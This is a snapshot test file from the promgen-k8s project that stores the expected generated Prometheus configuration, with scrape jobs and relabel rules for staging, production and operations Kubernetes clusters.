|
2020-04-10T15:02:43.000Z
|
tests/snapshots/snap_promgen_k8s_test.py
|
cmur2/promgen-k8s
|
df44928071896376f2c0263723aab8a8033f6263
|
[
"Apache-2.0"
] | 2
|
2017-11-10T13:08:27.000Z
|
2020-04-10T01:48:09.000Z
|
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['TestPromgenK8s::test_generate 1'] = [
'---',
'global:',
' evaluation_interval: 1m',
' scrape_interval: 1m',
'rule_files:',
' - /etc/alert.rules',
'scrape_configs:',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-nodes',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-ingresses',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: ingress',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_ingress_path',
' target_label: __address__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_ingress_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_name',
' target_label: kubernetes_ingress_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-cadvisor',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs:',
' - action: replace',
' regex: ^/machine\\.slice/machine-rkt\\\\x2d([^\\\\]+)\\\\.+/([^/]+)\\.service$',
' replacement: ${2}-${1}',
' source_labels:',
' - id',
' target_label: rkt_container_name',
' - action: replace',
' regex: ^/system\\.slice/(.+)\\.service$',
' replacement: ${1}',
' source_labels:',
' - id',
' target_label: systemd_service_name',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics/cadvisor',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-service-endpoints',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: endpoints',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs: []',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_scrape',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' source_labels:',
' - __address__',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-services',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: service',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __param_target',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' - action: replace',
' regex: reverse.default.svc:443',
' replacement: https_401',
' source_labels:',
' - __param_target',
' target_label: __param_module',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' job_name: staging-kubernetes-pods-default',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.staging.example.com',
' bearer_token_file: /var/run/kube_secrets/staging_bearer_token',
' role: pod',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: drop',
' regex: .+',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.staging.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/staging_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-nodes',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-ingresses',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: ingress',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_ingress_path',
' target_label: __address__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_ingress_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_name',
' target_label: kubernetes_ingress_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-cadvisor',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: node',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs:',
' - action: replace',
' regex: ^/machine\\.slice/machine-rkt\\\\x2d([^\\\\]+)\\\\.+/([^/]+)\\.service$',
' replacement: ${2}-${1}',
' source_labels:',
' - id',
' target_label: rkt_container_name',
' - action: replace',
' regex: ^/system\\.slice/(.+)\\.service$',
' replacement: ${1}',
' source_labels:',
' - id',
' target_label: systemd_service_name',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics/cadvisor',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-service-endpoints',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: endpoints',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs: []',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_scrape',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' source_labels:',
' - __address__',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-services',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: service',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __param_target',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' job_name: production-kubernetes-pods-default',
' kubernetes_sd_configs:',
' - api_server: https://api.internal.production.example.com',
' bearer_token_file: /var/run/kube_secrets/production_bearer_token',
' role: pod',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: drop',
' regex: .+',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: api.internal.production.example.com:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' tls_config:',
' ca_file: /var/run/kube_secrets/production_ca_crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-nodes',
' kubernetes_sd_configs:',
' - role: node',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-ingresses',
' kubernetes_sd_configs:',
' - role: ingress',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_ingress_path',
' target_label: __address__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_ingress_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_ingress_name',
' target_label: kubernetes_ingress_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-cadvisor',
' kubernetes_sd_configs:',
' - role: node',
' metric_relabel_configs:',
' - action: replace',
' regex: ^/machine\\.slice/machine-rkt\\\\x2d([^\\\\]+)\\\\.+/([^/]+)\\.service$',
' replacement: ${2}-${1}',
' source_labels:',
' - id',
' target_label: rkt_container_name',
' - action: replace',
' regex: ^/system\\.slice/(.+)\\.service$',
' replacement: ${1}',
' source_labels:',
' - id',
' target_label: systemd_service_name',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_node',
' - action: replace',
" replacement: ''",
' target_label: __meta_kubernetes_node_label_node_role_kubernetes_io_master',
' - action: labelmap',
' regex: __meta_kubernetes_node_label_(.+)',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: replace',
' regex: (.+)',
' replacement: /api/v1/nodes/${1}:10255/proxy/metrics/cadvisor',
' source_labels:',
' - __meta_kubernetes_node_name',
' target_label: __metrics_path__',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-service-endpoints',
' kubernetes_sd_configs:',
' - role: endpoints',
' metric_relabel_configs: []',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_scrape',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' source_labels:',
' - __address__',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_service_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-services',
' kubernetes_sd_configs:',
' - role: service',
' metric_relabel_configs: []',
' metrics_path: /api/v1/namespaces/monitoring/services/blackbox-exporter/proxy/probe',
' params:',
' module:',
' - http_2xx',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_probe',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_annotation_prometheus_io_module',
' target_label: __param_module',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: __param_target',
' - action: replace',
' regex: (.+);(.+)',
' replacement: $1$2',
' separator: ;',
' source_labels:',
' - __param_target',
' - __meta_kubernetes_service_annotation_prometheus_io_path',
' target_label: __param_target',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_service_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_service_name',
' target_label: kubernetes_service_name',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-pods-default',
' kubernetes_sd_configs:',
' - role: pod',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: drop',
' regex: .+',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
